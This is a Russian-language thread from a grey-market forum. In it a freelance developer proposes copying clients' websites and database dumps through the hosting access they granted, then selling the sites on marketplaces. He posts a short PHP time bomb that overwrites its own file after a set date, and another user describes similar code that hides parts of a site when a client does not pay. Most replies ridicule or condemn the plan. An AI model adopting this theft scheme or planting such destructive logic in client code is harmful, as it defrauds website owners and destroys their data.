• VLMI - форум по обмену информацией. На форуме можете найти способы заработка, разнообразную информацию по интернет-безопасности, обмен знаниями, курсы/сливы.

После регистрации будут доступны основные разделы.

Контент форума создают пользователи, администрация за действия пользователей не несёт ответственности, отказ от ответственности. Так же перед использованием форума необходимо ознакомиться с правилами ресурса. Продолжая использовать ресурс вы соглашаетесь с правилами.
  • Подпишись на наш канал в Telegram для информации о актуальных зеркалах форума: https://t.me/vlmiclub

Заработок на продаже сайтов

fullstackru

Участник
Реакции
5
0 руб.
Начнем с того, что я full stack разработчик и довольно долгое время работал на фрилансе.

Ну и вот, как-то на днях зашел на один сервис по продаже сайтов и тут же в голове возникла такая идея, - а что, если сливать сайты заказчиков на подобные биржи? Как правило, большинство заказчиков предоставляют доступ к хостингу, поэтому даже у якобы "разработчика" появляется возможность стянуть dump и все файлы сайта. Ну, а после - слить сайт на бирже.

Мне кажется, - на этом можно хорошенько поднять, учитывая спрос. Возможно идея не уникальная, но буду наедятся на то, что вам пригодиться данная информация.

P.S. Сам идею не тестил и не собираюсь просто по тому, что совесть не позволяет.

Последнее редактирование:

Tony Marlboro

Местный
Реакции
102
0 руб.
Telegram
Как по мне слишком уж некомпетентно) это как заказывать у прогера софт, и получать готовую работу со стиллером в подарок)

NewStalker

Участник
Реакции
2
0 руб.
Telegram
Идея хорошая,помню nvuti был,скачал бесплатно но оказался не рабочий,за 500р мне его настроили,и так продавал вышло что-то около 5к
Продавал по 500р потом по 250
Инфу кидал о продаже где только можно))

Petro

Новичок
Реакции
0
0 руб.
Чепуха, сейчас на варезниках тысячи тем и wordpress и джумла и всякого добра, качай, переводи и ставь.

fullstackru

Участник
Реакции
5
0 руб.
Чепуха, сейчас на варезниках тысячи тем и wordpress и джумла и всякого добра, качай, переводи и ставь.

Прикол в том, что сайты заказчиков уже полностью сделанные и имеют трафик от мало до велика. Более того, можно разрушить сайт в ровно назначенную дату с помощью следующего кода:

Код:
if( strtotime('28.10.2019') < time() )
{
    file_put_content(__FILE__, 'Your text...');
}

За счет этого вы получите преимущество, если заказчик не успеет сделать back up до апдейта. Ну, а если поставить тему, написать или спарсить контент (по вашему мнению) - на это уйдет не мало времени, учитывая оптимизацию сайта: Schema.org, Open Graph, Турбо-страницы, AMP-страницы, RSS-ленты и т. д., и т. п.

Ulquorra

Участник
Реакции
23
0 руб.
Telegram
Что тут забыл Фулл стак разработчик ? извини но я смеюсь тебе в лицо, ты без напряга можешь в белой части инета поднимать от 200к в месяц.

Ulquorra

Участник
Реакции
23
0 руб.
Telegram
а еще даже по меркам дарка, ты та еще крыса, и делая выводы из твоего поста, любой более менее дееспособный человек с тобой работать не будет. Поправьте граждане если где-то ошибся. Совесть ему не позволяет :laughing:

Подобный код встречал на просторах Тостера он (код) не удалял данные с сайта, а просто делал сам сайт прозрачным, и если заказчик не оплачивал в скрок, каждый день исчезала определенная часть сайта... смотрелось очень эффектно. А поделился тот чел из соображения человечности, дабы заказчики не кидали.

Последнее редактирование:

4elo8ek

Участник
Реакции
38
0 руб.
меня ниразу не кидали заказчики, я просто не давал им доступов никаких пока мне не упадут бабки, воть и все

fullstackru

Участник
Реакции
5
0 руб.
Что тут забыл Фулл стак разработчик ? извини но я смеюсь тебе в лицо, ты без напряга можешь в белой части инета поднимать от 200к в месяц.

Фрилансом я более не занимаюсь, поэтому мне плевать на заказчиков. Более того, я никогда и никого не кидал на фрилансе. Ну, а здесь я только по тому, что мне нравиться данный форум.

Я просто озвучил идею, которой могут воспользоваться пользователи данного форума. Ну, а судя по твоему ответу - ты тот еще тормоз. Нахрена мне беспонтовые сайты заказчиков, когда я могу сделать в 100 раз лучше? И нахрена мне вообще сайт, если все мое основное время отнимает работа? Да и подобного рода "бизнес" с моими навыками - совсем ни к чему.

Ulquorra

Участник
Реакции
23
0 руб.
Telegram
сам себе противоречишь, с твоеи профой у людей пукнуть времени не бывает.

Ulquorra

Участник
Реакции
23
0 руб.
Telegram
красиво заранее отмазался? что бы люд чесной твои скил не решил проверить ? ))) красиво поешь соловей

raptor-dm

Местный
Реакции
120
0 руб.
Да и к стати, нормальные на голову люди в дарк не лезут))))))))))))))))
Разве этот форум дарк? я только один знаю дарк, это рунион. Или топовые форумы в поисковиках ты называешь темными?

Sawai

Участник
Реакции
26
0 руб.
Разве этот форум дарк? я только один знаю дарк, это рунион. Или топовые форумы в поисковиках ты называешь темными?
До апдейта этот сайт был не местом обитания инфоцыган, а теневым форумом (не в обиду, мол, теперь же форум по обмену инфой). До сих пор валяются закладки с уже удаленными темами

Tony Marlboro

Местный
Реакции
102
0 руб.
Telegram
Ну как-то не очень это все)) У хороших разрабов всегда куча своих клиентов которые кормят его вечно.
У хороших - да. А это явно плохой, и не важно насколько он профессиональный. С его идеями его сразу можно слать куда подальше)

Сверху Снизу